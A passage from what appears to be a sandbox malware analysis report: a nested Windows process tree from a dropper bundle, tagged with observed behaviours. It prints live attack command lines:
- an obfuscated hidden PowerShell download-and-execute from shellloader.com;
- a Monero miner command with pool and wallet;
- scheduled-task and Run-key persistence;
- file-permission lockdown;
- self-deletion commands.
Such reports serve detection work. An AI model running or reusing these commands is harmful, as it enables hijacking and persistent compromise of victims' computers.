                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:6140
                                                                                                    • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                      9⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:4236
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                        10⤵
                                                                                                          PID:7292
                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                            11⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:7800
                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                          10⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4248
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                          10⤵
                                                                                                            PID:7460
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4020
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4756
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                            10⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:6528
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4624
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 688
                                                                                                          9⤵
                                                                                                          • Program crash
                                                                                                          PID:2292
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 840
                                                                                                          9⤵
                                                                                                          • Program crash
                                                                                                          PID:868
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 896
                                                                                                          9⤵
                                                                                                          • Program crash
                                                                                                          PID:5336
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 940
                                                                                                          9⤵
                                                                                                          • Program crash
                                                                                                          PID:5680
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 1000
                                                                                                          9⤵
                                                                                                          • Program crash
                                                                                                          PID:5936
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 1100
                                                                                                          9⤵
                                                                                                          • Program crash
                                                                                                          PID:5144
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 680
                                                                                                          9⤵
                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                          • Program crash
                                                                                                          PID:5464
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1108
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4164
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1012
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2460
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1636
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4516
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3176
                                                                                                        • C:\ProgramData\8187961.exe
                                                                                                          "C:\ProgramData\8187961.exe"
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:2680
                                                                                                        • C:\ProgramData\6111119.exe
                                                                                                          "C:\ProgramData\6111119.exe"
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                          PID:4932
                                                                                                        • C:\ProgramData\7848959.exe
                                                                                                          "C:\ProgramData\7848959.exe"
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:1932
                                                                                                          • C:\ProgramData\7848959.exe
                                                                                                            "C:\ProgramData\7848959.exe"
                                                                                                            10⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4680
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 948
                                                                                                            10⤵
                                                                                                            • Program crash
                                                                                                            PID:5328
                                                                                                        • C:\ProgramData\7479873.exe
                                                                                                          "C:\ProgramData\7479873.exe"
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1176
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe
                                                                                                  5⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4144
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\Sun05d60bc3b96248e5.exe
                                                                                                    Sun05d60bc3b96248e5.exe
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Modifies system certificate store
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4216
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                      7⤵
                                                                                                        PID:4892
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          taskkill /f /im chrome.exe
                                                                                                          8⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:4452
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe
                                                                                                    5⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4168
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\Sun050462125c7d35.exe
                                                                                                      Sun050462125c7d35.exe
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4292
                                                                                                      • C:\ProgramData\1441614.exe
                                                                                                        "C:\ProgramData\1441614.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4916
                                                                                                      • C:\ProgramData\2558136.exe
                                                                                                        "C:\ProgramData\2558136.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Adds Run key to start application
                                                                                                        PID:4984
                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:648
                                                                                                      • C:\ProgramData\1354845.exe
                                                                                                        "C:\ProgramData\1354845.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1708
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 688
                                                                                                          8⤵
                                                                                                          • Program crash
                                                                                                          PID:4136
                                                                                                      • C:\ProgramData\6003733.exe
                                                                                                        "C:\ProgramData\6003733.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4252
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe
                                                                                                    5⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4184
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\Sun05899db881f67fb29.exe
                                                                                                      Sun05899db881f67fb29.exe
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4412
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe
                                                                                                    5⤵
                                                                                                      PID:4208
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\Sun054fe19a12cb3.exe
                                                                                                        Sun054fe19a12cb3.exe
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4460
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-URFH1.tmp\Sun054fe19a12cb3.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-URFH1.tmp\Sun054fe19a12cb3.tmp" /SL5="$9003A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\Sun054fe19a12cb3.exe"
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:4692
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-1329S.tmp\46807GHF____.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-1329S.tmp\46807GHF____.exe" /S /UID=burnerch2
                                                                                                            8⤵
                                                                                                            • Drops file in Drivers directory
                                                                                                            • Executes dropped EXE
                                                                                                            • Adds Run key to start application
                                                                                                            • Drops file in Program Files directory
                                                                                                            PID:4492
                                                                                                            • C:\Program Files\Internet Explorer\EMIPSUZPGK\ultramediaburner.exe
                                                                                                              "C:\Program Files\Internet Explorer\EMIPSUZPGK\ultramediaburner.exe" /VERYSILENT
                                                                                                              9⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4996
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-9E7HM.tmp\ultramediaburner.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-9E7HM.tmp\ultramediaburner.tmp" /SL5="$301E0,281924,62464,C:\Program Files\Internet Explorer\EMIPSUZPGK\ultramediaburner.exe" /VERYSILENT
                                                                                                                10⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in Program Files directory
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                PID:4072
                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                  11⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2112
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\cf-71ee8-7af-574ac-fa619023cd7cb\Jovoniwahy.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\cf-71ee8-7af-574ac-fa619023cd7cb\Jovoniwahy.exe"
                                                                                                              9⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks computer location settings
                                                                                                              PID:4112
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\e2-ee156-7c2-6b8ba-6cc7b2c3ad072\Vupywitike.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\e2-ee156-7c2-6b8ba-6cc7b2c3ad072\Vupywitike.exe"
                                                                                                              9⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5136
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xn0zmdkm.i0m\GcleanerEU.exe /eufive & exit
                                                                                                                10⤵
                                                                                                                  PID:3400
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\xn0zmdkm.i0m\GcleanerEU.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\xn0zmdkm.i0m\GcleanerEU.exe /eufive
                                                                                                                    11⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:6276
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m3sr1xiy.53s\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                  10⤵
                                                                                                                    PID:6460
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\m3sr1xiy.53s\installer.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\m3sr1xiy.53s\installer.exe /qn CAMPAIGN="654"
                                                                                                                      11⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Enumerates connected drives
                                                                                                                      • Modifies system certificate store
                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                      PID:6888
                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\m3sr1xiy.53s\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\m3sr1xiy.53s\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631210717 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                        12⤵
                                                                                                                          PID:7300
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qzltbsaz.luy\anyname.exe & exit
                                                                                                                      10⤵
                                                                                                                        PID:6944
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\qzltbsaz.luy\anyname.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\qzltbsaz.luy\anyname.exe
                                                                                                                          11⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:7116
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i2l0rtfn.sco\gcleaner.exe /mixfive & exit
                                                                                                                        10⤵
                                                                                                                          PID:6216
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\i2l0rtfn.sco\gcleaner.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\i2l0rtfn.sco\gcleaner.exe /mixfive
                                                                                                                            11⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5992
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wr0mbrkj.p45\autosubplayer.exe /S & exit
                                                                                                                          10⤵
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:6664
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone
                                                                                                                5⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4236
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\Sun05fa3b4d2ae56e.exe
                                                                                                                  Sun05fa3b4d2ae56e.exe /mixone
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4400
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 656
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5032
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 672
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4776
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 680
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:1052
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 696
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5448
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 888
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5372
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\79B5.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\79B5.exe
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5664
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\AEDF.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\AEDF.exe
                                                                                                          2⤵
                                                                                                            PID:7216
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\AEDF.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\AEDF.exe
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Adds Run key to start application
                                                                                                              PID:4684
                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                icacls "C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                4⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:3192
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\AEDF.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\AEDF.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:6196
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\AEDF.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\AEDF.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Modifies extensions of user files
                                                                                                                  PID:7744
                                                                                                                  • C:\Users\Admin\AppData\Local\ba7104f9-5016-4ba9-892c-049f18772c54\build2.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\ba7104f9-5016-4ba9-892c-049f18772c54\build2.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:7056
                                                                                                                    • C:\Users\Admin\AppData\Local\ba7104f9-5016-4ba9-892c-049f18772c54\build2.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\ba7104f9-5016-4ba9-892c-049f18772c54\build2.exe"
                                                                                                                      7⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Checks processor information in registry
                                                                                                                      PID:6280
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\ba7104f9-5016-4ba9-892c-049f18772c54\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                        8⤵
                                                                                                                          PID:5304
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /im build2.exe /f
                                                                                                                            9⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:1412
                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                            timeout /t 6
                                                                                                                            9⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:6852
                                                                                                                    • C:\Users\Admin\AppData\Local\ba7104f9-5016-4ba9-892c-049f18772c54\build3.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\ba7104f9-5016-4ba9-892c-049f18772c54\build3.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:7260
                                                                                                                      • C:\Users\Admin\AppData\Local\ba7104f9-5016-4ba9-892c-049f18772c54\build3.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\ba7104f9-5016-4ba9-892c-049f18772c54\build3.exe"
                                                                                                                        7⤵
                                                                                                                          PID:8172
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                            8⤵
                                                                                                                            • Creates scheduled task(s)
                                                                                                                            PID:7244
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\F1D5.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\F1D5.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                PID:5096
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\F1D5.exe"
                                                                                                                  3⤵
                                                                                                                    PID:5176
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout /T 10 /NOBREAK
                                                                                                                      4⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:5536
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vUslFXaOvQ.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\vUslFXaOvQ.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:7468
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
                                                                                                                      4⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:4860
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\B8CF.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\B8CF.exe
                                                                                                                  2⤵
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  PID:2788
                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                1⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:2800
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                  2⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:5092
                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                1⤵
                                                                                                                  PID:2764
                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                  1⤵
                                                                                                                    PID:344
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-ABETD.tmp\setup_2.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-ABETD.tmp\setup_2.tmp" /SL5="$401DA,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:4276
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4856
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-T98QN.tmp\setup_2.tmp
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-T98QN.tmp\setup_2.tmp" /SL5="$7006A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        PID:4380
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-3JN4H.tmp\postback.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-3JN4H.tmp\postback.exe" ss1
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          PID:1516
                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                            explorer.exe ss1
                                                                                                                            5⤵
                                                                                                                              PID:5740
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                                                6⤵
                                                                                                                                  PID:6032
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                                                    7⤵
                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                    PID:5308
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ScYWlZMGs.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\ScYWlZMGs.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:7700
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                                                                                                                    7⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    PID:8012
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0zcufkzb\0zcufkzb.cmdline"
                                                                                                                                      8⤵
                                                                                                                                        PID:4668
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
